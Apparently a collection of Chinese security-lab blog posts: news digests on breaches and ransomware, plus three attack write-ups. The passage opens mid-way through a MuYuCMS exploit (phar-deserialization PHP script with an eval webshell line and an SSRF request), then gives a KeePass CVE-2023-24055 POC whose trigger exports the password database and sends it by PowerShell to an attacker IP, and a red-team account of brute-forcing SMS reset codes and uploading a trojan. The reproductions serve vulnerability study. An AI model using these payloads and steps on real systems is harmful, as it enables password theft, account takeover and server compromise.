@unlink('shell.jpg');    $phar = new Phar("shell.phar"); //    $phar->startBuffering();    $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');    $object = new Windows();    //$object ->haha= 'eval(@$_POST[\'a\']);';    // $object ->haha= 'phpinfo();';    $phar->setMetadata($object);    $phar->addFromString("a", "a"); //添加要压缩的文件      $phar->stopBuffering();      echo (base64_encode(serialize(new Windows()))); } ?> 生成 phar 序列化数据包 修改后缀，启动 python 服务器 构造数据包下载远程的文件到本地 GET /public/static/admin/static/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:8000/shell.png HTTP/1.1 Host: test.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: XDEBUG_SESSION=PHPSTORM Connection: close 执行 phar 序列化 http://test.test/admin.php/update/rmdirr.html?dirname=phar://./public/upload/images/1676882763141961.png 　　‍ 注意事项 在最开始，获取远程图片的时候，一直出现错误 提示 链接contentType不正确 通过在代码中查找，定位到问题位置 校验了 Content-Type 的值 经过不断的调试仍然发现不了问题出现在哪 但是发现通过 phpstudy 默认的 apache 服务是没问题的 通过抓包对比发现 一个是 Content-Type 另一个是 Content-type 我直接修改了 python 的源代码 将其中的小写 t 替换成了大写 T　‍ 漏洞分析 \app\admin\controller\Update::rmdirr 通过协议绕过了对文件名的检测然后触发了反序列漏洞 MuYuCMS-master/public/static/admin/static/ueditor/php/controller.php

1、WIP26间谍活动滥用云基础设施针对电信公司 https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/ SentinelLabs与QGroup GmbH的研究人员一直监控被追踪为WIP26的威胁活动。WIP26背后的威胁行为者滥用公共云基础设施以中东的电信提供商为目标。威胁行为者通过包含Dropbox链接的WhatsApp消息精确定位员工来启动感染链。诱骗员工下载并执行加载程序，最终会导致部署利用Microsoft 365 Mail和Google Firebase 2、葡萄牙供水公司Aguas do Porto遭LockBit勒索软件攻击 https://securityaffairs.com/142477/cyber-crime/lockbit-water-utility-aguas-do-porto.html LockBit勒索软件组织声称已经入侵了葡萄牙市政供水公司Aguas do Porto，并威胁要泄露被盗数据。Aguas do Porto是一家市政供水公司，负责管理包括供水和废水排放在内的整个水循环。LockBit勒索软件组织将市政供水公司添加到Tor泄漏网站的受害者名单中，截止日期为2023年3月7日。该组织尚未发布被盗数据样本作为安全漏洞的证据。目前，尚不清楚勒索软件团伙窃取的数据量和数据类型。Aguas do 3、二维码生成器MyQRcode泄露了用户的登录数据 https://www.hackread.com/qr-code-generator-my-qr-code-data-leak/ 流行的二维码生成器网站MyQRcode正在泄露用户的个人数据。安全漏洞已导致超过128 GB的数据泄露，其中包括66000名客户的个人信息。泄露是由于错误配置引起的，这使得公众可以在没有任何安全认证或密码的情况下公开访问服务器。并且数据每天都在更新新记录，这表明泄露仍在进行中。泄露的数据包括客户的个人和登录凭证，包括全名、职称、电子邮件地址、密码哈希、二维码URL、电话号码、物理地址、社交媒体资料链接等。安全研究员Anurag Sen向Hackread.com报告 4、印度火车票购票平台RailYatri遭黑客攻击泄露用户信息 https://www.hackread.com/indian-ticketing-platform-railyatri-hacked/ 印度流行的火车票预订平台RailYatri遭遇大规模数据泄露，超过3100万（31062673）用户/乘客的个人信息暴露。据信，此次泄密事件发生在2022年12月下旬，敏感信息数据库目前正在网上泄露。泄露的数据包括电子邮件地址、全名、性别、电话号码和位置，这可能使数百万用户面临身份盗用、网络钓鱼攻击和其他网络犯罪的风险。该数据库已在Breachforums黑客论坛上泄露。 5、加密货币交易所 Coinbase遭黑客攻击 https://securityaffairs.com/142507/cyber-crime/coinbase-smishing-attack.html Coinbase 加密货币交易所是复杂网络攻击的受害者，黑客发起了一场针对加密货币交易所 Coinbase 员工的诈骗活动。 6、Frebniis 恶意软件滥用 Microsoft IIS 功能创建后门 https://securityaffairs.com/142466/malware/frebniis-malware-iis.html Broadcom Symantec 研究人员发现了一种新的恶意软件，被追踪为 Frebniis，它滥用 IIS来部署后门并监视系统所有 HTTP 流量。 7、Atlassian 员工凭证被盗，导致数据泄露 https://securityaffairs.com/142424/data-breach/atlassian-data-leak.html Atlassian 披露了一起数据泄露事件，该事件是由用于窃取第三方供应商数据的员工凭证被盗造成的。 8、三星发布Message Guard 可保护设备免受零点击攻击 https://www.securityweek.com/new-samsung-message-guard-protects-mobile-devices-against-zero-click-exploits/ 随着最新旗舰 Galaxy 智能手机的推出，三星推出了名为 Message Guard 的新沙盒功能，旨在保护设备免受零点击攻击。 9、Twitter 关闭了非订阅者基于短信的2FA https://www.securityweek.com/twitter-shuts-off-text-based-2fa-for-non-subscribers/ 日前推特方面宣布，自 3 月 20 日开始，将不再支持用户基于短信的双重因素身份验证（2FA）方式，仅购买了 " 推特蓝 "（Twitter Blue）订阅服务的用户才可继续使用。 10、针对中文用户，黑客利用谷歌搜索广告传播恶意软件 https://www.secrss.com/articles/52007 ESET在一篇研究报告上表示，其安全研究员发现了一个针对东亚和东南亚华语人群的恶意软件活动。攻击者通过在Google搜索结果中购买误导性广告，诱骗受害者下载安装木马程序。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

一、漏洞描述 漏洞简述 KeePass 是一款免费的开源密码管理器，可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中，该数据库由一把万能钥匙锁定。因此，您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全的加密算法（AES-256、ChaCha20 和 Twofish）进行加密。 对 KeePass 配置文件具有写入权限的攻击者可以修改它并注入恶意触发器，例如通过添加导出触发器来获取明文密码。 漏洞影响范围 供应商：KeePass 产品：KeePass Password Safe 2 确认受影响版本：KeePass 2.53版本 修复版本：KeePass 2.53.1版本 二、漏洞复现实战 环境搭建 Step 1 KeePass 2.53 下载地址：https://keepass.info/ Step 2 KeePass翻译语言包 下载地址：https://keepass.info/translations.html 将语言包文件复制至安装路径下“Languages”文件夹下 在KeePass中进入语言设置，切换语言 漏洞复现 根据原理,在安装路径下的配置文件KeePass.config.xml，根据触发器功能的安全缺陷进行利用。 创建一个触发器，在密码数据库存在交互时进行明文传输。触发器创建主要细分为两种方式： （1）POC写入配置文件 将编写好的POC代码写入KeePass.config.xml，须符合触发器XML格式。 其中<Parameter>c:\Users\???\AppData\Local\Temp\exploit.xml</Parameter>字段为明文传输路径。 利用powershell以GET方式传输数据库中密码文件。 POC： <TriggerSystem> <Triggers> <Trigger> <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid> <Name>exploit</Name> <Events> <Event> <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid> <Parameters> <Parameter>0</Parameter> <Parameter /> </Parameters> </Event> </Events> <Conditions /> <Actions> <Action> <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid> <Parameters> <Parameter>c:\Users\???\AppData\Local\Temp\exploit.xml</Parameter> <Parameter>KeePass XML (2.x)</Parameter> <Parameter /> <Parameter /> </Parameters> </Action> <Action> <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid> <Parameters> <Parameter>PowerShell.exe</Parameter> <Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\???\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.XXX.XXX:8888/$var -Method GET </Parameter> <Parameter>False</Parameter> <Parameter>1</Parameter> <Parameter /> </Parameters> </Action> </Actions> </Trigger> </Triggers> </TriggerSystem> 保存KeePass.config.xml文件，触发器功能查看exploit触发器 （2）通过触发器功能手工创建触发器 以官方触发器构成为参考 https://keepass.info/help/kb/trigger_examples.htmlexploit触发器配置如下： 属性项：命名为exploit，其余默认配置 事件项：选择Saved database file（已保存数据库文件），判断条件选Equals（相等） 条件项：为空 操作项： 导出当前数据库 文件路径为上述文件传输路径 文件格式选择 KeePass XML (2.x) 执行命令行/URL 文件路径为PowerShell.exe ，使触发器执行PowerShell 参数选择攻击接收的路径 窗口方式选择Hidden 完成创建，可以看到exploit触发器 在攻击机 创建web服务，后续接收传输后的密码明文； 在KeePass中新建一条密码记录并保存，可以看到攻击机终端已接收到明文信息 进行base64解码，可以看到内容为密码记录内容，包含账号与密码等敏感信息。 漏洞修复 建议更新至KeePass 2.53.1 版本 结束语 本文主要介绍了CVE-2023-24055 KeePass敏感信息明文传输漏洞的复现过程，漏洞主要利用对 KeePass 配置文件在写入权限下可以修改它并注入恶意触发器，例如通过添加导出触发器来获取明文密码。

1、APT37组织通过隐写术传播新的M2RAT恶意软件 https://asec.ahnlab.com/ko/47622/ AhnLab安全应急响应中心（ASEC）分析小组在1月份确认，RedEyes攻击组织（也称为APT37、ScarCruft）正在通过Hangul Encapsulated PostScript（EPS）漏洞（CVE-2017-8291）传播恶意软件。此次RedEyes组织的攻击活动主要利用隐写技术传播恶意代码。黑客组织向目标发送了包含恶意附件的钓鱼电子邮件。打开附件会触发对韩国常用的韩文文字处理器中的旧EPS漏洞（CVE-2017-8291）的利用。该漏洞将导致shellcode在受害者的计算机上运行，下载并执行存储在JPE 2、汤加通信公司遭到勒索软件攻击影响其行政运作 https://therecord.media/tonga-is-the-latest-pacific-island-nation-hit-with-ransomware/ 汤加国有电信公司向客户发出警告，称其受到了勒索软件的攻击。汤加通信公司（TCC）在Facebook上发布通知称，这次攻击可能会减慢行政运作。该公司表示“勒索软件攻击已被证实是为了加密和锁定对TCC部分系统的访问。这不会影响向客户提供语音和互联网服务，但可能会减缓连接新客户、交付账单和管理客户查询的过程。”网络安全专家Dominic Alvieri表示，Medusa勒索软件组织声称对周一的TCC攻击负责。 3、SAS航空公司遭到网络攻击导致网站和应用离线 https://www.hackread.com/sas-airlines-hit-by-cyber-attack/ 2月14日，SAS航空公司遭到网络攻击，迫使该公司的网站和应用程序离线，乘客无法访问。据路透社报道，该航空公司敦促客户不要使用其移动应用程序，因为他们可能会收到不正确的信息。据报道，包括挪威客户在内的一些用户登录了错误的账户，访问了其他客户的数据。SAS的新闻负责人Karin Nyman表示，该问题现已得到解决。该航空公司没有提供有关这次攻击事件的细节。 4、安全厂商Fmsisoft警告称黑客正在伪造其证书以入侵网络 https://www.bleepingcomputer.com/news/security/emsisoft-says-hackers-are-spoofing-its-certs-to-breach-networks/ 网络安全公司Emsisoft警告，一名黑客正在使用伪造的代码签名证书冒充Emsisoft公司来瞄准使用其安全产品的客户，希望以此绕过他们的防御。这些假证书的名称似乎与可信赖的实体相关联，但实际上并不是有效证书。Emsisoft表示，威胁行为者可能通过暴力破解RDP或使用属于目标组织员工的被盗凭证获得了对受感染设备的初始访问权。一旦攻击者获得了对端点的访问权限，他们就会安装 5、Apache修复了Kafka中的远程代码执行漏洞 https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-apache-kafka Apache解决了一个可能利用Kafka Connect发起远程代码执行（RCE）攻击的漏洞，漏洞被跟踪为CVE-2023-25194。该漏洞只有在访问Kafka Connect worker（一个逻辑工作单元组件）时才会触发，并且用户还必须能够使用任意Kafka客户端SASL JAAS配置和基于SASL的安全协议来创建或修改worker连接器。利用Kafka漏洞，经过身份验证的攻击者可以通过Aiven API或Kafka 6、研究人员发现新挖矿攻击利用Exchange ProxyShell漏洞 https://www.bleepingcomputer.com/news/security/microsoft-exchange-proxyshell-flaws-exploited-in-new-crypto-mining-attack/ 一种名为“ProxyShellMiner”的新型恶意软件利用Microsoft Exchange ProxyShell漏洞在整个Windows域中部署加密货币矿工。攻击者利用ProxyShell漏洞CVE-2021-34473和CVE-2021-34523来获得对组织网络的初始访问权。之后，将.NET恶意软件有效载荷放入域控制器的NETLOGON文件夹 7、德国多个机场网站遭到DDos攻击影响航班运作 https://securityaffairs.com/142373/breaking-news/german-airports-websites-failures.html 上周四，德国几个机场的网站无法访问，专家展开调查，推测可能是针对关键基础设施进行的大规模网络攻击。ADV机场协会的首席执行官证实，这些网站遭到了DDoS攻击。机场的其他系统没有受到影响。这起网络攻击事件发生的前一天，一次IT故障导致德国国家航空公司汉莎航空（Lufthansa）在法兰克福机场的数千名乘客取消和延误航班。机场管理人员证实，这些问题很可能是由恶意流量引起的。 8、HAProxy发布补丁修复HTTP请求走私漏洞 https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy HAProxy是一款流行的开源负载均衡器和反向代理，它修补了一个漏洞，该漏洞使攻击者能够发起HTTP请求走私攻击。通过发送恶意制作的HTTP请求，攻击者可以绕过HAProxy的过滤器，并获得对后端服务器的未经授权访问。HAProxy维护者Willy Tarreau表示，自2019年6月发布的HAProxy 2.0版本以来，该漏洞就一直存在。Tarreau正在积极维护HAProxy的七个版本，并为所有这些版本发布了修复程序。 9、研究人员披露多款Arris路由器存在RCE漏洞 https://www.securityweek.com/newly-disclosed-vulnerability-exposes-eol-arris-routers-to-attacks/ Malwarebytes警告称，一个远程代码执行漏洞会影响多款Arris路由器，该漏洞被跟踪为CVE-2022-45701，是由于路由器固件没有正确中和请求中的特殊字符，这允许安全研究员可以执行shell脚本命令注入。受影响的型号已达到生命周期终止（EOL），不太可能收到补丁。该安全漏洞影响运行固件版本9.1.103的G2482A、TG2492和SBG10路由器，这些路由器在拉丁美洲和加勒比地区很常见 10、GoDaddy披露遭到黑客入侵并窃取了源代码 https://securityaffairs.com/142405/data-breach/godaddy-discloses-data-breach-2.html 网络托管公司GoDaddy披露攻击者窃取了源代码并在其服务器上安装了恶意软件。威胁行为者已经破坏了其cPanel共享托管环境，该公司表示无法确定最初入侵的时间，但是它仍在调查漏洞以确定事件的根本原因。安装在该公司系统上的恶意软件会间歇性地将随机客户网站重定向到恶意网站。GoDaddy透露，多年来有证据表明，这些威胁行为者与全球其他网络托管服务提供商的攻击有关。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言： 在最近的wxb举行hw中，同事让我帮他看看一些后台登录站点。尝试了未授权，弱口令皆无果，要么不存在弱口令，要么有验证码，没办法绕过。本文章仅提供一个思路，在hw中更多时候并不推荐尝试这种思路，只能作为一种解，因为花费的时间较长，前后大概花费了一个小时才拿下一个后台账号。 过程及思路： 在外围打点的过程中发现了一个站点，存在用户名枚举： 然后看到下面的验证码，估计很多都会放弃了吧！短信验证码+密码才能登录，爆破难度太大了。我一开始也是这么想的，后面尝试了下面的找回密码，看看是否能任意修改他人的账号密码。 后续先用自己不常用的手机号获取下验证码（这一步其实在hw中是很危险的，很容易被溯源）。发现短信验证码为四位数，而且失效时间大约在3分钟左右。查看这边重置密码的条件也就是短信验证码。这时候还记得我们前面发现的用户名枚举吗？我的思路是结合这两个漏洞，实现重置他人密码。 那么问题来了，我怎么知道用户的手机号码呢？或者说，手机号码那么多我要怎么找呢？这个是一个地级市的服务平台，那么他的用户理论上会存在大部分的该地级市的手机号码。每个地区的号码都是由前七位控制的，那么就可以查询一个地区的所有前七位号码，在加上遍历后面4位号码即可获得一个地区的手机号字典。这边给大家推荐一个工具，可以用来爬取一个地级市所有的手机号码。使用后会在本地生成字典号码。 然后把这些号码用burp去爆破，就可以获取到数据库里面存在的账号了。 通过爆破，我们获取到了后台账号，再结合前面的4位数验证码，去尝试爆破。 抓取重置密码的请求包，密码我们提前写好了： 再用intruder去爆破短信验证码： 皇天不负有心人，尝试了几次，终于成功了。当我高高兴兴拿着密码去登录时，发现还要验证码，这时候再重复一下前面的操作就行了。 然后就是把整个响应包的内容复制下来，再去点击下登录，然后替换掉登录报错的信息即可成功进入后台。 里面富含大量敏感信息，虽然没啥用。 然后在功能列表里面找到一个上传图片的地方，并未做过滤，成功上传木马： 但是没啥用，解析不了QAQ。本次只是给大家介绍一下思路，方法是可行的。其实我也不想用这种方法，但是更多的是想验证自己的猜想，才最终去实践证明。

1、Mirai V3G4 僵尸网络利用 13 个漏洞攻击物联网设备 https://securityaffairs.com/142358/malware/mirai-v3g4-botnet.html Palo Alto Networks Unit 42 研究人员报告称，一种名为 V3G4 的 Mirai 变体试图利用多个漏洞在 2022 年 7 月至 2022 年 12 月期间感染物联网设备。 威胁行为者的目标是感染尽可能多的系统以组成可用于进行多种攻击（包括 DDoS 攻击）的僵尸网络。 2、现代和起亚修补允许使用 USB 数据线盗窃汽车的漏洞 https://securityaffairs.com/142303/breaking-news/hyundai-kia-theft-usb-cable.html 汽车制造商现代汽车和起亚汽车正在为几种车型附带的软件推出紧急更新。该更新解决了一个漏洞，窃贼可以利用该漏洞窃取受影响的车辆。预估有 380 万辆现代汽车和 450 万辆起亚汽车受到影响。 3、奥克兰市遭勒索软件攻击后进入紧急状态 https://securityaffairs.com/142295/cyber-crime/city-of-oakland-emergency-ransomware.html 由于 2023 年 2 月 8 日袭击该市的勒索软件攻击的影响，奥克兰市已宣布当地进入紧急状态。出于谨慎考虑，奥克兰市已将受影响的系统下线，同时他们努力保护受影响的基础设施。 4、新的 MortalKombat 勒索软件用于经济动机的活动 https://securityaffairs.com/142319/cyber-crime/mortalkombat-ransomware.html 自 2022 年 12 月以来，思科 Talos 研究人员一直在观察一个身份不明的出于经济动机的威胁行为者部署了两种新的恶意软件，即最近发现的 MortalKombat 勒索软件和 Laplas Clipper 恶意软件的 GO 变体。威胁参与者正在互联网上扫描具有暴露的远程桌面协议 (RDP) 端口 3389 的系统。恶意软件活动针对个人、小型企业和大型组织，其最终目标是窃取或要求以加密货币支付赎金。 5、Firefox 更新补丁修复数十个高危漏洞 https://www.securityweek.com/firefox-updates-patch-10-high-severity-vulnerabilities/ Mozilla 本周宣布发布 Firefox 110 和 Firefox ESR 102.8，其中包含针对 10 个高危漏洞的补丁。 6、黑客利用谷歌广告传播伪装成主流应用的 FatalRAT 恶意软件 https://thehackernews.com/2023/02/hackers-using-google-ads-to-spread.html 被伪装的应用程序包括 Google Chrome、Mozilla Firefox、Telegram、WhatsApp、LINE、Signal、Skype、Electrum、搜狗拼音法、有道和 WPS Office；大多数受害者位于中国台湾、中国大陆和香港，其次是马来西亚、日本、菲律宾、泰国、新加坡、印度尼西亚和缅甸。 7、欧洲的数百个系统被发现感染了 ESXiArgs 勒索软件 https://securityaffairs.com/142336/cyber-crime/esxiargs-ransomware-infections.html Censys 的研究人员报告称，在新一波ESXiArgs 勒索软件攻击中，已有 500 多台主机被感染，其中大部分位于法国、德国、荷兰和英国。 8、黑客开始在攻击中使用 Havoc 后渗透框架 https://www.bleepingcomputer.com/news/security/hackers-start-using-havoc-post-exploitation-framework-in-attacks 安全研究人员发现威胁行为者正在转向一种新的开源命令和控制 (C2) 框架，称为 Havoc，以替代 Cobalt Strike 和 Brute Ratel 等付费工具。 9、思科安全产品更新修补了ClamAV中的严重漏洞 https://www.securityweek.com/critical-vulnerability-patched-in-cisco-security-products 思科周三宣布更新端点、云和网络安全产品，以解决第三方扫描库 ClamAV 中的一个严重漏洞。ClamAV 是一个开源的跨平台反恶意软件工具包，可以检测木马、病毒和其他类型的恶意软件。 10、网空对抗重大变量：俄罗斯拟豁免亲俄黑客行动的法律责任 https://www.secrss.com/articles/51894 自俄乌战争爆发以来，俄罗斯网络前线得到多个黑客组织的支持，其中一部分与俄官方关系密切，还有一些与国家利益保持着较为松散的独立状态，后一部分黑客组织在西方甚至是俄罗斯的法律条款中，已经属于网络罪犯，不过这种情况似乎正在改变。据俄罗斯广播电台 Govoritmoskva 在 2 月10 日报道称，杜马信息政策委员会正在考虑这类亲俄派黑客的“罪责”问题。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。